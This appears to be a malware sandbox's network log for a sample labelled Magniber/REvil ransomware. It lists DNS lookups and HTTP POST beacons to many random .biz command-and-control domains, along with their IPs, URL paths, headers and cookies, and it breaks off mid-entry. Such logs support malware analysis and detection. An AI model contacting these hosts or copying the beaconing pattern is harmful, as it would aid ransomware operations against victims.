Set-Cookie: btst=603d667f9cae00e85d7b615c772f9a0d|191.101.209.39|1719160437|1719160437|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

warkcdu.biz

alg.exe

Remote address:

8.8.8.8:53

Request

warkcdu.biz

IN A

Response

warkcdu.biz

IN A

18.141.10.107
POST

http://warkcdu.biz/vdvrf

alg.exe

Remote address:

18.141.10.107:80

Request

POST /vdvrf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: warkcdu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f7b55d972b7fca6f76760baea2f3abfe|191.101.209.39|1719160438|1719160438|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gcedd.biz

alg.exe

Remote address:

8.8.8.8:53

Request

gcedd.biz

IN A

Response

gcedd.biz

IN A

13.251.16.150
DNS

gcedd.biz

alg.exe

Remote address:

8.8.8.8:53

Request

gcedd.biz

IN A
DNS

gcedd.biz

alg.exe

Remote address:

8.8.8.8:53

Request

gcedd.biz

IN A

Response

gcedd.biz

IN A

13.251.16.150
POST

http://gcedd.biz/pcwflvmf

alg.exe

Remote address:

13.251.16.150:80

Request

POST /pcwflvmf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gcedd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=37e0fbe18d63f0ad6b1aa638b6dc9c5e|191.101.209.39|1719160439|1719160439|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://gcedd.biz/bpifsvqhv

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

13.251.16.150:80

Request

POST /bpifsvqhv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gcedd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:33:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e8bb0e2e280d7a3eccd7fed261d45f16|191.101.209.39|1719160439|1719160439|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

jwkoeoqns.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

jwkoeoqns.biz

IN A

Response

jwkoeoqns.biz

IN A

18.208.156.248
POST

http://jwkoeoqns.biz/qlbhhpb

alg.exe

Remote address:

18.208.156.248:80

Request

POST /qlbhhpb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jwkoeoqns.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2efc0b0944363bcf435a2b39a319dc79|191.101.209.39|1719160439|1719160439|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

xccjj.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

xccjj.biz

IN A

Response

xccjj.biz

IN A

44.213.104.86
DNS

jwkoeoqns.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

jwkoeoqns.biz

IN A

Response

jwkoeoqns.biz

IN A

18.208.156.248
POST

http://xccjj.biz/ixo

alg.exe

Remote address:

44.213.104.86:80

Request

POST /ixo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xccjj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=361d0d8700a2fa62908842bfee95417f|191.101.209.39|1719160440|1719160440|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://jwkoeoqns.biz/cuipqcdfgsj

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.208.156.248:80

Request

POST /cuipqcdfgsj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jwkoeoqns.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d33b7352a48df8fe299b51871fcedfa9|191.101.209.39|1719160440|1719160440|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

hehckyov.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

hehckyov.biz

IN A

Response

hehckyov.biz

IN A

44.221.84.105
DNS

xccjj.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

xccjj.biz

IN A

Response

xccjj.biz

IN A

44.213.104.86
POST

http://xccjj.biz/sicsrtxs

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

44.213.104.86:80

Request

POST /sicsrtxs HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xccjj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8ed1fc93d149e9dd232e1509ffff779b|191.101.209.39|1719160440|1719160440|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://hehckyov.biz/jy

alg.exe

Remote address:

44.221.84.105:80

Request

POST /jy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: hehckyov.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5abd08f3474e6ae22b0f2e306ba440e1|191.101.209.39|1719160440|1719160440|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

hehckyov.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

hehckyov.biz

IN A

Response

hehckyov.biz

IN A

44.221.84.105
POST

http://hehckyov.biz/unxsi

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

44.221.84.105:80

Request

POST /unxsi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: hehckyov.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b57c03ee3a7f55534345e7a39bd7bc6b|191.101.209.39|1719160440|1719160440|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

rynmcq.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

rynmcq.biz

IN A

Response

rynmcq.biz

IN A

54.244.188.177
POST

http://rynmcq.biz/jt

alg.exe

Remote address:

54.244.188.177:80

Request

POST /jt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rynmcq.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=312a5657e93a6b681393b9e019e2235e|191.101.209.39|1719160441|1719160441|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

rynmcq.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

rynmcq.biz

IN A

Response

rynmcq.biz

IN A

54.244.188.177
POST

http://rynmcq.biz/e

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

54.244.188.177:80

Request

POST /e HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rynmcq.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6c7a6a2b335f66354b1732b7b974946d|191.101.209.39|1719160441|1719160441|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

uaafd.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

uaafd.biz

IN A

Response

uaafd.biz

IN A

3.254.94.185
POST

http://uaafd.biz/muoxygygdvutqbiv

alg.exe

Remote address:

3.254.94.185:80

Request

POST /muoxygygdvutqbiv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uaafd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=30cd60fc121dd765c0230cccc77fc113|191.101.209.39|1719160441|1719160441|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

uaafd.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

uaafd.biz

IN A

Response

uaafd.biz

IN A

3.254.94.185
POST

http://uaafd.biz/htxsrwxpjwjwpw

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

3.254.94.185:80

Request

POST /htxsrwxpjwjwpw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uaafd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b2e0f03000df95315c31a1ce9e72f1ec|191.101.209.39|1719160441|1719160441|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

eufxebus.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

eufxebus.biz

IN A

Response

eufxebus.biz

IN A

18.141.10.107
POST

http://eufxebus.biz/aoudeicsshkurlwk

alg.exe

Remote address:

18.141.10.107:80

Request

POST /aoudeicsshkurlwk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: eufxebus.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1f094ab84e235fe56448a27c1091de1b|191.101.209.39|1719160442|1719160442|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

eufxebus.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

eufxebus.biz

IN A

Response

eufxebus.biz

IN A

18.141.10.107
POST

http://eufxebus.biz/hoipcdbunouxdvf

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.141.10.107:80

Request

POST /hoipcdbunouxdvf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: eufxebus.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=925dfa2f9acc45a980e86c5b0ba47e83|191.101.209.39|1719160442|1719160442|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

pwlqfu.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

pwlqfu.biz

IN A

Response

pwlqfu.biz

IN A

34.246.200.160
POST

http://pwlqfu.biz/ht

alg.exe

Remote address:

34.246.200.160:80

Request

POST /ht HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pwlqfu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=36fe96fc564deaa4925e1643e6c423f0|191.101.209.39|1719160442|1719160442|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

pwlqfu.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

pwlqfu.biz

IN A

Response

pwlqfu.biz

IN A

34.246.200.160
POST

http://pwlqfu.biz/tt

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

34.246.200.160:80

Request

POST /tt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pwlqfu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=dc4b369875a9c3bf4f27f946bc243a24|191.101.209.39|1719160442|1719160442|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

rrqafepng.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

rrqafepng.biz

IN A

Response

rrqafepng.biz

IN A

47.129.31.212
DNS

rrqafepng.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

rrqafepng.biz

IN A

Response

rrqafepng.biz

IN A

47.129.31.212
POST

http://rrqafepng.biz/kydhpcrlingwus

alg.exe

Remote address:

47.129.31.212:80

Request

POST /kydhpcrlingwus HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rrqafepng.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=679c0a03508f537a62b46b43324fca3a|191.101.209.39|1719160443|1719160443|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://rrqafepng.biz/to

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

47.129.31.212:80

Request

POST /to HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rrqafepng.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8883dd094840f9fa68cd5c0a758e463c|191.101.209.39|1719160443|1719160443|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ctdtgwag.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

ctdtgwag.biz

IN A

Response

ctdtgwag.biz

IN A

3.94.10.34
DNS

ctdtgwag.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

ctdtgwag.biz

IN A

Response

ctdtgwag.biz

IN A

3.94.10.34
POST

http://ctdtgwag.biz/ctsqf

alg.exe

Remote address:

3.94.10.34:80

Request

POST /ctsqf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ctdtgwag.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8b77c8ff7271c8da90e3225400956267|191.101.209.39|1719160444|1719160444|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://ctdtgwag.biz/nnuuuo

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

3.94.10.34:80

Request

POST /nnuuuo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ctdtgwag.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b815fd4df9ded92dcc732466776a45b8|191.101.209.39|1719160444|1719160444|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

tnevuluw.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

tnevuluw.biz

IN A

Response

tnevuluw.biz

IN A

35.164.78.200
DNS

tnevuluw.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

tnevuluw.biz

IN A

Response

tnevuluw.biz

IN A

35.164.78.200
POST

http://tnevuluw.biz/sghyeiwwrdvmtaos

alg.exe

Remote address:

35.164.78.200:80

Request

POST /sghyeiwwrdvmtaos HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tnevuluw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=42ebb275ebca11aeff0f0ec7f20b0e8d|191.101.209.39|1719160444|1719160444|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://tnevuluw.biz/e

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

35.164.78.200:80

Request

POST /e HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tnevuluw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a96e00ac0274d66f309fdba7ee964915|191.101.209.39|1719160444|1719160444|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

whjovd.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

whjovd.biz

IN A

Response

whjovd.biz

IN A

18.141.10.107
DNS

znwbniskf.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

znwbniskf.biz

IN A

Response

znwbniskf.biz

IN A

47.129.31.212
DNS

whjovd.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
